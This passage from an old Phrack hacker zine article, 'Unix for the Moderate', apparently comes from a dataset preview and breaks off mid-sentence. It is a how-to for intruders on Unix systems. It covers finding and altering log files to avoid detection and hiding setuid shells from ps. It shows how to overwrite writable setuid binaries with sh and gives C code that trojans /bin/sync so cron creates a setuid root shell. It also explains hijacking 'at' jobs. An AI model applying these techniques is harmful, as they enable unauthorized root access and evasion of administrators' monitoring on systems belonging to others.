text stringlengths 0 1.99k |
|---|
BBS or via UUCP mail at ...!uunet!ncoast!ghost. |
Phrozen Ghost |
=============================================================================== |
==Phrack Inc.== |
Volume Two, Issue 18, Phile #6 of 11 |
------------------------------------------------------------------------------ |
Unix for the Moderate |
------------------------------------------------------------------------------- |
By: The Urvile, Necron 99, and a host of me. |
------------------------------------------------------------------------------- |
Disclaimer: |
This is mainly for system five. I do reference BSD occasionally, but I |
mark those. All those little weird brands (i.e., DEC's Ultrix, Xenix, and |
so on) can go to hell. |
Security: (Improving yours.) |
-Whenever logging onto a system, you should always do the following: |
$ who -u |
$ ps -ef |
$ ps -u root |
or BSD: |
$ who; w; ps uaxg |
This prints out who is on, who is active, what is going on presently, |
everything in the background, and so on. |
And the ever popular: |
$ find / -name "*log*" -print |
This lists out all the files with the name 'log' in it. If you do find a |
process that is logging what you do, or an odd log file, change it as soon |
as you can. |
If you think someone may be looking at you and you don't want to leave |
(Useful for school computers) then go into something that allows shell |
breaks, or use redirection to your advantage: |
$ cat < /etc/passwd |
That puts 'cat' on the ps, not 'cat /etc/passwd'. |
If you're running a setuid process, and don't want it to show up on a ps |
(Not a very nice thing to have happen), then: |
$ super_shell |
# exec sh |
Runs the setuid shell (super_shell) and puts something 'over' it. You may |
also want to run 'sh' again if you are nervous, because if you break out of |
an exec'ed process, you die. Neat, huh? |
Improving your id: |
-First on, you should issue the command 'id' & it will tell you you your |
uid and euid. (BSD: whoami; >/tmp/xxxx;ls -l /tmp/xxxx will tell you your |
id [whoami] and your euid [ls -l].), terribly useful for checking on setuid |
programs to see if you have root euid privs. Also, do this: |
$ find / -perm -4000 -exec /bin/ls -lad {} ";" |
Yes, this finds and does an extended list of all the files that have the |
setuid bit on them, like /bin/login, /bin/passwd, and so on. If any of |
them look nonstandard, play with them, you never can tell what a ^| will do |
to them sometimes. Also, if any are writeable and executable, copy sh over |
them, and you'll have a setuid root shell. Just be sure to copy whatever |
was there back, otherwise your stay will probably be shortened a bit. |
-What, you have the bin passwd? |
Well, game over. You have control of the system. Everything in the bin |
directory is owned by bin (with the exception of a few things), so you can |
modify them at will. Since cron executes a few programs as root every once |
in a while, such as /bin/sync, try this: |
main() |
{ |
if (getuid()==0 || getuid()==0) { |
system("cp /bin/sh /tmp/sroot"); |
system("chmod 4777 /tmp/sroot"); } |
sync(); |
} |
$ cc file.c |
$ cp /bin/sync /tmp/sync.old |
$ mv a.out /bin/sync |
$ rm file.c |
Now, as soon as cron runs /bin/sync, you'll have a setuid shell in |
/tmp/sroot. Feel free to hide it. |
-the 'at' & 'cron' commands: |
Look at the 'at' dir. Usually /usr/spool/cron/atjobs. If you can run 'at' |
(check by typing 'at'), and 'lasttimedone' is writable, then: submit a |
blank 'at' job, edit 'lastimedone' to do what you want it to do, and move |
lasttimedone over your entry (like 88.00.00.00). Then the commands you put |
in lasttimedone will be ran as that file's owner. Cron: in |
/usr/spool/cron/cronjobs, there are a list of people running cron jobs. |
Cat root's, and see if he runs any of the programs owned by you (Without |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.